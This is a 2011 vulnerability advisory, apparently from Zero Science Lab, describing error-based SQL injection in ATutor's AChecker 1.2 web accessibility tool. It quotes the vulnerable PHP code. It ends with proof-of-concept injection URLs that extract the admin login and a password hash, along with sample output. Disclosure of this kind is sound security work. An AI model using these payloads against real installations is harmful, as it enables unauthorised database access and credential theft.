ATutor AChecker version 1.2 suffers from multiple remote SQL injection vulnerabilities.
69d0f7a89f886464429de2e220cc5aeecc1f9b05cd0e22b446911e96c541b9f1
AChecker 1.2 Multiple Error-Based SQL Injection vulnerabilities
Vendor: ATutor (Inclusive Design Institute)
Product web page: http://www.atutor.ca
Affected version: 1.2 (build r530)
Summary: AChecker is an open source Web accessibility evaluation tool.
It can be used to review the accessibility of Web pages based on a variety
international accessibility guidelines.
Desc: Input passed via the parameter 'myown_patch_id' in '/updater/patch_edit.php'
and the parameter 'id' in '/user/user_create_edit.php' script is not properly
sanitised before being used in SQL queries. This can be exploited to manipulate
SQL queries by injecting arbitrary SQL code.
==========================================================================
/updater/patch_edit.php:
------------------------------
20: if (!isset($_REQUEST["myown_patch_id"]))
21: {
22: $msg->addError('NO_ITEM_SELECTED');
23: exit;
24: }
25:
26: $myown_patch_id = $_REQUEST["myown_patch_id"];
27:
28: $myownPatchesDAO = new MyownPatchesDAO();
29: $myownPatchesDependentDAO = new MyownPatchesDependentDAO();
30: $myownPatchesFilesDAO = new MyownPatchesFilesDAO();
31:
32: // URL called by form action
33: $savant->assign('url', dirname($_SERVER['PHP_SELF']) . "/patch_creator.php?myown_patch_id=" . $myown_patch_id);
34:
35: $savant->assign('patch_row', $myownPatchesDAO->getByID($myown_patch_id));
36: $savant->assign('dependent_rows', $myownPatchesDependentDAO->getByPatchID($myown_patch_id));
37: $savant->assign('file_rows', $myownPatchesFilesDAO->getByPatchID($myown_patch_id));
------------------------------------------------------------------------
/user/user_create_edit.php:
------------------------------
103: if (isset($_GET['id'])) // edit existing user
104: {
105: $usersDAO = new UsersDAO();
106: $savant->assign('user_row', $usersDAO->getUserByID($_GET['id']));
107: $savant->assign('show_password', false);
108:
109: }
==========================================================================
Tested on: Microsoft Windows XP Professional SP3 (EN)
Apache 2.2.14 (Win32)
PHP 5.3.1
MySQL 5.1.41
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
liquidworm gmail com
Zero Science Lab - http://www.zeroscience.mk
Advisory ID: ZSL-2011-5034
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5034.php
01.08.2011
--
PoC:
- http://localhost/updater/patch_edit.php?myown_patch_id=1 and(select 1 from(select count(*),concat((select (select login) from `ac_users` limit 1,1),floor(rand(0)*2))x from `information_schema`.tables group by 2)j)
+ Output:
Duplicate entry 'admin1' for key 'group_key'
-==========================-
- http://localhost/user/user_create_edit.php?id=78 and(select 1 from(select count(*),concat((select (select password) from `ac_users` limit 1,1),floor(rand(0)*2))x from `information_schema`.tables group by 2)j)
+ Ouput:
Duplicate entry 'd033e22ae348aeb5660fc2140aec35850c4da9971' for key 'group_key'
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed